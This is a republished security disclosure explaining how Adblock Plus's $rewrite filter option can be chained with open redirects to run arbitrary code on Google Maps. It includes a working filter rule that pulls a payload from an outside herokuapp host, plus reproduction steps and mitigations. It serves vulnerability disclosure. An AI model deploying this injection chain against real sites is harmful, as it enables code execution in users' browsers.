综合技术

Adblock Plus filter lists may execute arbitrary code in web pages

微信扫一扫,分享到朋友圈

Adblock Plus filter lists may execute arbitrary code in web pages
0

A new version of Adblock Plus
was released
on July 17, 2018. Version 3.2 introduced a new filter option for rewriting requests. A day later AdBlock
followed suit and released support for the new filter option. uBlock
, being owned by AdBlock, also implemented the feature.

Under certain conditions the $rewrite
filter option enables filter list maintainers to inject arbitrary code in web pages.

The affected extensions have more than 100 million active users, and the feature is trivial to exploit in order to attack any sufficiently complex web service, including Google services, while attacks are difficult to detect and are deployable in all major browsers.

Considering the nature and implications of the uncovered vulnerabilities, and given that filter lists have been employed in the past for politically motivated attacks
, details of the exploit chain are publicly disclosed to ensure the fastest possible propagation of upcoming mitigations in the affected browser extensions and web services.

Attack

The $rewrite
filter option is used by some ad blockers to remove tracking data and block ads by redirecting requests. The option allows rewrites only within the same origin, and requests of SCRIPT
, SUBDOCUMENT
, OBJECT
and OBJECT_SUBREQUEST
types are not processed.

However, web services can be exploited with the help of this filter option when they use XMLHttpRequest or Fetch to download code snippets for execution, while allowing requests to arbitrary origins and hosting a server-side open redirect.

Extensions periodically update filters at intervals determined by filter list operators. Attacks are difficult to detect because the operator may set a short expiration time for the malicious filter list, which is then replaced with a benign one. Organizations and individuals may be targeted based on the IP addresses from which the updates are requested.

The following criteria must be met for a web service to be exploitable using this method:

  1. The page must load a JS string using XMLHttpRequest or Fetch and execute the returned code
  2. The page must not restrict origins from which it can fetch using Content Security Policy directives, or it must not validate the final request URL before executing the downloaded code
  3. The origin of the fetched code must have a server-side open redirect or it must host arbitrary user content

Filter list operators may deliver a rule update such as this:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

The above rule redirects the target request to Google’s I’m Feeling Lucky
search service, which then redirects to a page with the payload: alert(document.domain)
.

Steps for running arbitrary code on Google Maps:

  1. Install either Adblock Plus, AdBlock or uBlock in a new browser profile
  2. Visit the options of the extension and add the example filter list
    , this step is meant to simulate a malicious update to a default filter list
  3. Navigate to Google Maps
  4. An alert with “www.google.com” should pop up after a couple of seconds

Gmail and Google Images also meet the listed conditions to be exploitable.

Google has been notified about the exploit, but the report was closed as “Intended Behavior”, since they consider the potential security issue to be present solely in the mentioned browser extensions. This is an unfortunate conclusion, because the exploit is composed of a set of browser extension and web service vulnerabilities that have been chained together.

Please note that the vulnerability is not limited to Google services, other web services could be affected as well.

Mitigation

The exploit can be mitigated in the affected web services by whitelisting known origins using the connect-src
CSP header, or by eliminating server-side open redirects.

Ad blocking extensions should consider dropping support for the $rewrite
filter option. It’s always possible to abuse the feature to some degree, even if only images or style sheets are allowed to be redirected.

Users may also switch to uBlock Origin
. It does not support the $rewrite
filter option and it is not vulnerable to the described attack.

This blog and my open source projects
are made possible thanks to the support of awesome backers.
If you’d like to join them, please consider contributing with Patreon
, PayPal
or Bitcoin
.

阅读原文...


微信扫一扫,分享到朋友圈

Adblock Plus filter lists may execute arbitrary code in web pages
0

Hacker News

Vulnerability Spotlight: Denial of service in VMWare Workstation 15

上一篇

摩托罗拉Razr可折叠手机和摩托罗拉One Vision亮相蓝牙认证网站

下一篇

评论已经被关闭。

插入图片

热门分类

往期推荐

Adblock Plus filter lists may execute arbitrary code in web pages

长按储存图像,分享给朋友